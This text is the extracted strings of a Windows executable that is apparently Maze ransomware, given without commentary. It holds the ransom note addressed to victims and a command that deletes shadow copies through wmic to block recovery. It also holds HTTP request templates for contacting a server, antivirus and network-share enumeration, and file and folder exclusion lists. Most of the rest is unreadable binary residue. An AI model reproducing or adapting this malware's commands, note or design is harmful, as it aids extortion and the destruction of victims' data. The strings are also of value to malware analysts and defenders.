!This program cannot be run in DOS mode.
zPRich
`.rdata
@.data
.reloc
D$@WVPh
NGGCCCC
user32.dll
DDDD^_[]
user32.dll
kernel32.dll
t$,Whl
kernel32.dll
DDDDWh
kernel32.dll
DDDD^_[]
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDDVh
kernel32.dll
kernel32.dll
FFFFVj
$GFTOAAAAj
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
@@@@@UPh
kernel32.dll
t$,Ph5
kernel32.dll
\$(j@h
D$ PSh
DDDDDDDD
t$|hQ@
user32.dll
@SUh3D
kernel32.dll
kernel32.dll
DDDDVh
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[]
kernel32.dll
$GFTOAAAAj
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$0PVh
kernel32.dll
DDDDSh<U
DDDDVh6"
kernel32.dll
t$ Uh W
kernel32.dll
^_[]DDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
t$dUhH\
CCCCCCCCSh6]
kernel32.dll
DDDDDDDD
t$`Uh{_
user32.dll
user32.dll
KKKKKKKKSh
DDDDDDDDSVUWh
L$ WPQW
G j PV
3<$3l$
+q +Q$f
+q +Q$f
D$4VUP
D$\WVP
t$<VWU
l$(SWU
l$(SWU
t$`)D$
\$,+L$l
T$,)L$
|$X+\$h
DDDD^_[]
#D$<3D$@
3T$H#D$,#T$81
\$ #L$$#\$
#t$(#L$01
\$D#D$
D$H#L$D
D$(#L$
t$$#D$@1
D$8#L$<
D$$#L$H
D$@3T$
#L$,#t$(
L$(#L$8
D$4FFFFFFFF
D$Hy!~
DDDDDDDD
D$pWPh
DDDDDDDD
DDDDj VSh
j WSh(+
|$0WSho+
DDDDDDDDWh
D$tPWSh
DDDDDDDD
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
WBBBBBBBB9
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
L$ PhwA
user32.dll
4^DDDD
4^DDDD
kernel32.dll
DDDDf.
kernel32.dll
kernel32.dll
 ^_[]DDDD
ole32.dll
ole32.dll
t$ Vh*I
ole32.dll
kernel32.dll
kernel32.dll
ole32.dll
kernel32.dll
t$(hDM
user32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
t$HVh<(
user32.dll
L$Ljh
L$DQhoV
D$xctio
D$tdire
D$pFsRe
D$low64
D$hertW
D$d4Rev
D$`Wow6
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
0=FUhHc
DDDD@Ph=f
kernel32.dll
@PVhif
DDDDDDDDSh
DDDD@Ph
SPjihe
kernel32.dll
7^_[]DDDD
DDDD^DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[DDDD
^_[]DDDD
DDDD@@Ph
kernel32.dll
DDDDDDDD
DDDD^_DDDD
DDDD^_DDDD
FFFFFFF
DDDD@Ph
DDDDDDDDVhuo
DDDD@Ph
kernel32.dll
kernel32.dll
D$@PSj
D$@PVj
^_[]DDDD
D$@PhEt
DDDD@@Ph
DDDDDDDDUhRu
kernel32.dll
kernel32.dll
kernel32.dll
D$@jnh
\$@jGh
|$ WhW
user32.dll
kernel32.dll
user32.dll
user32.dll
DDDDDDDD
D<;VPhE~
DDDDDDDD9
D$8th: 
D$4Leng
D$0ent-
D$,ContS
kernel32.dll
DDDDDDDD1
kernel32.dll
jPWVh&
DDDDVh
kernel32.dll
^_[]DDDD
kernel32.dll
QUSWhx
kernel32.dll
kernel32.dll
DDDDDDDD^_[]DDDD
kernel32.dll
\$DjLh
user32.dll
kernel32.dll
kernel32.dll
D$h2123
D$d6543
D$`9887
D$\4678
D$X6525
D$T7897
D$P2154
D$L3743
D$D3245
D$@0987
kernel32.dll
DDDDh&+
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
^_[]DDDD
 ]DDDD
4]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDDDDDD]DDDD
 ]DDDD
8^_]DDDD
4]DDDD
@@@@@@@@
4]DDDD
`AAAAAAAA
kernel32.dll
4^_]DDDD
user32.dll
kernel32.dll
0]DDDD
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
T^]DDDD
0]DDDD
t$4Wh/
DDDDDDDD
GGGGWRQh6
DDDDDDDD
DDDDDDDD
L$ VQPh\
L$ VQPh
)D$ SR
AAAA;H
AAAAAAAA;H
AAAA;H
AAAAAAAA;H
wkAAAARQPh
$AAAAAAA
DDDD^_[]
AAAAAAA
$AAAAAAA
DDDD^_[]
HHHHHHHH
DDDDDDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
DDDDDDDD
L$,;L$(
AAAAAAA
DDDDDDDD
D$$Ph2
HHHHHHHH
$AAAAAAA
$AAAAAAA
$AAAAAAA
$AAAAAAA
AAAAAAA
DDDD^_
DDDD^_
IIIIIIII
AAAAAAA
AAAAAAA
AAAAAAA
IIIIIIII
AAAAAAA
DDDD^_[]
$AAAAAAA
DDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
$0<0u*
DDDD^_[]
kernel32.dll
^_[DDDD
^_[DDDD
^_[DDDD
^[DDDD
^[DDDD
^[DDDD
DDDD^DDDD
^_DDDD
^_DDDD
T^_DDDD
^_]DDDD
rZSVhe0
DDDDDDDD
DDDDDDDD
^_[]DDDD
@@@@@@
^_[]DDDD
@@@@@@
^_[]DDDD
DDDDWh<D
DDDDDDDD
^_[]DDDD
^_[]DDDD
xGGGGGGGG9
^_[]DDDD
^_DDDD
^_DDDD
DDDD^_[]DDDD
^_[DDDD
DDDDDDDD^_[]DDDD
$^_[]DDDD
$DDDD^DDDD
Wj Ph"
^]DDDD
^]DDDD
^]DDDD
^]DDDD
P j@Rh
DDDDSh
^_[]DDDD
Sj Ph*
P j@Rh
DDDD^_[]DDDD
@@@@@@@@
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
DDDDDDDD^_[DDDD
advapi32.dll
advapi32.dll
kernel32.dll
user32.dll
DDDDDDDD
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
user32.dll
DDDDDDDD
D^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
PQRVSh
kernel32.dll
RQUPht
user32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
user32.dll
^_DDDD
USWVPhx
advapi32.dll
user32.dll
advapi32.dll
user32.dll
advapi32.dll
DDDD^_[]
^_DDDD
^_DDDD
A,DDDD
ucjzh'
A(DDDD
w(^_DDDD
^_DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
DDDDSh
kernel32.dll
0^_DDDD
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_DDDD
^_[]DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
^_[DDDD
DDDDDDDD
^_[DDDD
kernel32.dll
user32.dll
kernel32.dll
DDDDDDDD
kernel32.dll
^_[DDDD
DDDD^DDDD
kernel32.dll
user32.dll
DDDD^DDDD
kernel32.dll
H^_DDDD
DDDDDDDD^DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@
kernel32.dll
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
ole32.dll
FFFFFFFF
ole32.dll
kernel32.dll
user32.dll
t$,hK9
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
USWVPj
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[]DDDD
WUSVh/K
DDDDDDDD^_[]
user32.dll
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
kernel32.dll
gdi32.dll
D$ PUh
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
|$4PQUh
user32.dll
kernel32.dll
user32.dll
user32.dll
kernel32.dll
gdi32.dll
gdi32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
l$ PWh
gdi32.dll
gdi32.dll
kernel32.dll
gdi32.dll
^_[]DDDD
user32.dll
kernel32.dll
kernel32.dll
^_DDDD
USWVPh
user32.dll
kernel32.dll
kernel32.dll
t$ PhHr
kernel32.dll
kernel32.dll
t$ Ph7u
kernel32.dll
D$D394
D$@4628
D$XPhRy
^_DDDD
^[DDDD
user32.dll
^_DDDD
kernel32.dll
83729304958372930dhejskrlt9483s
.action
.phtml
.shtml
register
logout
content
private
messages
account
webauth
webaccess
archive
signin
signout
update
support
ticket
tracker
analytics
checkout
payout
withdrawal
create
transfer
http://%s%s
ntdll.dll
NtQueryEaFile
GFTOAV
NtSetEaFile
D7q/;M
Wow64RevertWow64FsRedirection
Wow64DisableWow64FsRedirection
realloc
msvcrt.dll
malloc
GET /%s HTTP/1.1
User-Agent: %s
Host: %s
Connection: Keep-Alive
POST /%s HTTP/1.1
User-Agent: %s
Host: %s
Content-Type: %s
Content-Length: %d
Connection: Keep-Alive
Content-Length: 
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
application/x-www-form-urlencoded
37432154789765254678988765432123
09873245
Error: incorrect --path parameter syntax
Syntax:
--path "C:\path\example\super database\"
Exiting...
expand 32-byte kexpand 16-byte k
EnumChildWindows
CloseWindow
wsprintfA
MessageBoxW
DeferWindowPos
DestroyWindow
AdjustWindowRect
AnimateWindow
wsprintfW
GetForegroundWindow
MessageBoxA
PostQuitMessage
ShutdownBlockReasonCreate
DefWindowProcA
ShutdownBlockReasonDestroy
RegisterClassExW
CreateWindowExW
GetMessageA
TranslateMessage
DispatchMessageA
ReleaseDC
USER32.dll
SelectPalette
SetPaletteEntries
GetDeviceCaps
SetPixel
DeleteObject
GDI32.dll
lstrlenA
GetModuleHandleA
LoadLibraryA
lstrcpyA
WaitForSingleObject
lstrcatA
GetProcAddress
lstrlenW
CreateDirectoryW
GetLastError
LocalAlloc
TlsSetValue
lstrcpynW
HeapAlloc
lstrcatW
VirtualFree
FindNextFileW
lstrcmpW
OutputDebugStringW
FindClose
GetTickCount
ExitThread
CreateThread
CloseHandle
TlsGetValue
ExitProcess
CreateFileW
VirtualAlloc
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
WriteFile
GetModuleHandleW
GetSystemDirectoryW
CreateProcessW
GetShortPathNameW
ExpandEnvironmentStringsW
GetVersionExA
GetCurrentProcessId
VirtualQuery
VirtualProtect
IsBadReadPtr
FreeLibrary
lstrcmpA
AllocConsole
GetStdHandle
WriteConsoleW
UnmapViewOfFile
lstrcmpiW
lstrcpyW
SetFileAttributesW
MoveFileExW
FindFirstFileW
WaitForMultipleObjects
GetDriveTypeW
GetTickCount64
SetThreadExecutionState
GetCommandLineW
CreateMutexW
GetFileSizeEx
SetFilePointerEx
ReadFile
CreateFileMappingW
MapViewOfFile
GetCurrentProcess
LocalFree
GetUserDefaultUILanguage
InitializeCriticalSection
DeleteCriticalSection
SetLastError
EnterCriticalSection
LeaveCriticalSection
TerminateThread
GlobalAlloc
GlobalFree
KERNEL32.dll
LsaFreeMemory
EqualDomainSid
CryptGenRandom
LookupAccountSidW
LsaCreateTrustedDomainEx
EncryptionDisable
LsaQueryTrustedDomainInfo
LsaAddAccountRights
CryptAcquireContextW
CryptGenKey
CryptExportKey
AreAllAccessesGranted
CryptDestroyKey
CryptReleaseContext
LsaClose
GetSidSubAuthorityCount
GetSidSubAuthority
CryptImportKey
CryptEncrypt
CryptDecrypt
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
SHELL32.dll
LsaConnectUntrusted
Secur32.dll
DsRoleGetPrimaryDomainInformation
DsRoleFreeMemory
NETAPI32.dll
StrStrW
StrToIntA
SHLWAPI.dll
WNetOpenEnumW
WNetEnumResourceW
WNetAddConnection2W
WNetCloseEnum
MPR.dll
inet_pton
WS2_32.dll
InternetOpenA
InternetCrackUrlA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetCloseHandle
InternetReadFile
WININET.dll
CryptBinaryToStringW
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
CoUninitialize
CoInitializeEx
CoCreateInstance
ole32.dll
OLEAUT32.dll
IsProcessorFeaturePresent
e?#\Tn
Q4Rn>n
Y.LO3oYz
0x^#.hL
>*6$S<
%/ZU7~
I0'^a,
pf!qE^
d)z$vCq U
6^bE_2Cri<3$
X?Oo#
]5b"hs
lQN[,fzPm
q5roEra
;bh6b_
e?#\Tn
TW8Y~e?
r>0d1J
DfIB'h6B
@,tLW1
>isT2"
)?tG_`tz ,
nF=~Z:
0-L*V~T
6}mz>z_
lrU*Ce
V%9t{7}
`%-}vY
hh)o%(Q`
iYe#XMNhC
*iY}iX
XWK{a<
QD|=EU
#@uI3~E
Y^9p.:
"_8^uaW
C&C>@t.X
+=]MmXvp
,oN=N@4
~[Djw3
ww;_a
nF=~Z:
aZ4Oz%
GHw,!S
ppO+#L
S+aJ}m>
_2Oj]A
?l1t=;*S
>.bgJmE
+c.xcXK@D
-I=wZXz
KYCU;V
Fz&&wd
%GD@GD
oc1BLhX
2aWYDs7
o~E<\
oNK_HT
(OnT)il
([8EB&
,hSy3I
C:v@d=B
'TGt(v
Rm>;b<
2zYYl$
AA]Yc@DI%
y=:"i,O
hpZpS/
3DhEF)
`U!s'x
m><CZr
"i)R~I$
k&{Rt@R.
gq'~Io
SAD.`}
@$9>uu
%\>qwS
^Y!A{Q2
qX+<13OgK
qj2tnG
G$1Y_p!e
DSZGhq
/pOZog2
`]Vh4}f
q<uj;z
jD:*!u
cA7AO9]B'4
pxVDAc
UEhQt:_
J0fV23 0
{*.k-|
jGl@ur
4zHDbj:
)i_%S)
Ed{o*i
JzBdSx
=yxK{8
)&3'N@y
U=M7?LsZ
x=;P+{
/v:_xR
dIIJ<bK
%e%%e^
iVbV^Pp
fm=P6Ds
#HHx
j`@99bIQ
FKEapO
ej]WUg
lF2"Or
azyBRo
a:Z2-T
&6D+hux
O~OyJ5
hCAC@o
N@C~\F
lZKtk&
:i~z>,
 Sbf6O&
G'{4i:
\ZP753
T*Se4x
 WC\%ny
W#~ `l0;P@
rQ-jI5
$3HMP\rs
GcB<8ur
`_dd(Ke
7e7l7~7
8I8V8[8
:!:B:G:e:w:
=&>;>A>J>U>j>p>
102P2b2v2
3$3?3r3x3
4'494W4
7$8+8T9
;2;;;n;
>">4>r>
0&0<0B0
2"2<2E2
4)4J4Z4
6"7i7w7
78F8T8
99Y9b9
<(<Q<o<
>)>C>]>
012K2T2
80898K8]8k8
9;9L9^9
;';M;e;s;
0S0[0d0j0x0
2Q2Y2`2
7A7[7|7
8!8T8r8
8 9.9g9u9
:<;B;_;
<*<<<V<s<
0$060L0Z0o0
1+292u2
3$3F3i3
p0^5I:
1%2?2P2r2
3-3A3a3|3
4:5<2<M=T=W>^>k?r?
6R8Y8k8|8
:3;U;g;y;
050C0U0
111C1P1m1{1
7'7_7m7
708[8l8
=5>Z>b>
?,?A?z?
0<1Y1k1|1
1%2-252O2U2o2
6!7'7R7`7
858i8r8
9C9I9Q9c9q9
:5;C;U;~;
=&=T=b=
1%1a1j1
2%272g2
373T3q3
3;5A5~5
6.767>7
7'8O8i8
9(909H9{9
:;:C:P:q:
;";G;n;
=%=E=S=t=
>H>n>|>
>O?V?]?o?|?
0*0<0r0
5#6I6s6
:/:A:N:
0H0P0}0
393G3n3|3
67I7~7
7X8s8y8
:+:H:p:
;7<P<{<
?,?I?{?
1<1V1_1q1
1'2A2m2
3.3g3u3
4P4f4t4
>0?>?P?
1'1=1K1`1
2*3_3q3
7'8D8m8
9P:`:h:p:
;&;8;~;
<5<=<l<
><>Y>k>
0.1<1n1|1
949=9j9r9
:$:a:o:
?M?[?m?v?
3D3a3o3
3,3>3{3
999A9i9w9
=0=g=u=
5&5.5X5j5
4\4l4t4
81999P9":*:r:z:%<
4D4S4q4
6U76889
=S=e=o=
1$1N1`1
<0<6<P<
='=9=^=d=r=
>*>0>>>S>e>z>
2)424P4m4
646`6f6
8F8L8f8
9.9Z9g9m9
:?:s:y:
:H;a;g;u;
; <.<<<B<p<
>!>R>o>
?"?K?Q?
090y0
1P1^1p1
1"2'2O2b2
5E5S5e5n5
5<6B6q6
8!8&8-8\8c8u8
<1<C<|<
=3=u=z=
?l?t?{?
070m0r0x0
1"1?1s1
2E2[2x2
323:3_3k3
4C4Q4c4
5/5<5B5o5v5
8Q8_8h8z8
89'9k9s9
;);^;c;h;
<.<H<a<
=-=G=P=
?7?W?]?b?p?
0 0h0v0
151=1t1
2 2Q2z2
3,3[3l3
707P7w7
8I9f9x9
;!<2<\<
>+>U>o>x>
0^0d0~0
1Q1_1h1
2 2=2O2
304>4k4p4u4
5<5J5R5l5
7(7-727L7e7k7p7
8'84898>8
8$9]9c9
:$:E:J:O:i:r:
>A>^>p>
?6?^?f?x?
1+1k1z1
2 2W2_2
4@4r4z4
6(6Q6c6t6{6
6'7U7f7w7
828<8Z8`8e8
8;9g9m9
</=R=v=
=8>F>O>
>U?p?~?
01E1W1~1
8%8F8`8n8
:%;Q;~;
=T=b=t=
>>1>W>
222;2M2e2
4B4P4q4
747B7T7
9$:2:N:x:
=D>j>x>
>C?Q?f?
J0d0m0
3,3:3L3]3
5(5@5]5e5
6&6F6g6
6$727g7
788X8y8
:;:C:i:
?6?X?y?
1"1*1P1m1
3E3K3h3
4-5;5M5b5j5}5
7 8(8k8
8:9H9Z9
:0:]:w:
:7;E;z;
1'1,11191
2/2O2]2r2
44-4y4
5.5N5s5
7>7X7r7
:%:2:O:a:
6+737E7g7
8#8X8b8i8
:):F:N:f:
:$;D;i;
2-2J2o2t2
4V4[4`4
536A6S6v6
;g<u<~<
2 3]3w3
344B4k4s4
6>6v6{6
<:<`<n<
>1?K?T?f?{?
0Y0a0r0
1/1\1d1n1
6X7^7x7
8C8T8j8
95:>:g:
>$?D?V?d?
6 6+6F6
=A=^=p=
>!>B>c>
?^?l?~?
0'050>0P0
1#111C1k1y1
1Q2l2u2
4>4q4{4
5-6R6`6
&060>0m0~0
1*2V2r2
2=3f3n3{3
4J5X5{5
9%:S:\:n:
;3;A;r;
<0=L=Z=
3W3e3z3
3D4c4t4
8.969D9Y9
9R:`:r:
;8;U;g;
7=7K7]7
8(969[9
99:v:~:
?/?I?g?l?
2080U0
1!2>2P2]2
595v5~5
7)7B7x7
98:F:X:u:
=?=M=r=
>">(>.>4>F>g>
?'?,?i?
0D0M0R0
1;1B1T1f1
3!393\3
8.8k8p8x8
9/;I;n;|;
=,>1>6>r>
0V0^0p0
1?1Z1k1
3b3h3n3t3z3
4"4(4.444:4@4F4L4R4X4^4d4j4p4v4|4
5$5*50565<5B5H5N5T5Z5`5f5l5r5x5~5
6 6&6,62686c6
6E8c8|8
9 9$9(9r9x9|9
: :$:E:o:
; ;D>g>
0080B0O0Y00161<1B1H1N1T1Z1`1f1l1r1x1~1
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
7 7$7(7,70747
9 :$:(:,:0:4:\:`:
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>h>l>p>t>x>|>
3p6t6x6|6
8 9$9(9,909@9D9H9L9P9`9d9h9l9p9
jjjjjj
jjjjjj
jjjjjjj
{0AFACED1-E828-11D1-9187-B532F1E9575D}
%s\%s.%s
target
%s%s%s%s
CLASSIFIED
SECRET
\dump001.tmp
eMicrosoft Enhanced Cryptographic Provider v1.0
%USERID%
%base64key%
nkernel32
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.id='%s'
Win32_ShadowCopy.ID='%s'
\wbem\wmic.exe
"%s" shadowcopy delete
%windir%\system32\wbem\wmic
process call create "cmd /c start %s"
:\Windows
\Games\
\Tor Browser\
\ProgramData\
\cache2\entries\
\Low\Content.IE5\
\User Data\Default\Cache\
\All Users
\IETldCache\
\Local Settings\
\AppData\Local
AhnLab
Enc: %s
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890
\Program Files
Encrypting whole system
Encrypting specified folder in --path parameter...
!Finished in %d ms!
--logging
--nomutex
--noshares
--path
.Logging enabled | Maze
NO SHARES | 
NO MUTEX | 
Encrypting: 
%s.tmp
Global\%s
DECRYPT-FILES.txt
autorun.inf
boot.ini
desktop.ini
ntuser.dat
iconcache.db
bootsect.bak
ntuser.dat.log
thumbs.db
Bootfont.bin
overflow|
overflow
root\SecurityCenter2
Select * From AntiVirusProduct
displayName
|deprecated > v2.3|
%c_%c_%d/%d|
1234567890
qwertyuiopasdfghjklzxcvbnm1234567890                        
%shiberfil.sys
%spagefile.sys
%sswapfile.sys
Maze Ransomware
Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms
The only way to restore them is to buy decryptor
These algorithms are one of the strongest
You can read about them at wikipedia
If you understand the importance of situation you can restore all files by following instructions in DECRYPT-FILES.txt file
You can decrypt 3 files for free as a proof of work
We know that this computer is 
a standalone server
a server in corporate network
a workstation in corporate network
a primary domain controller
a backup server
very valuable for you
So we will give you appropriate price for recovering
\111.bmp
You need to buy decryptor in order to restore the files.
%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s
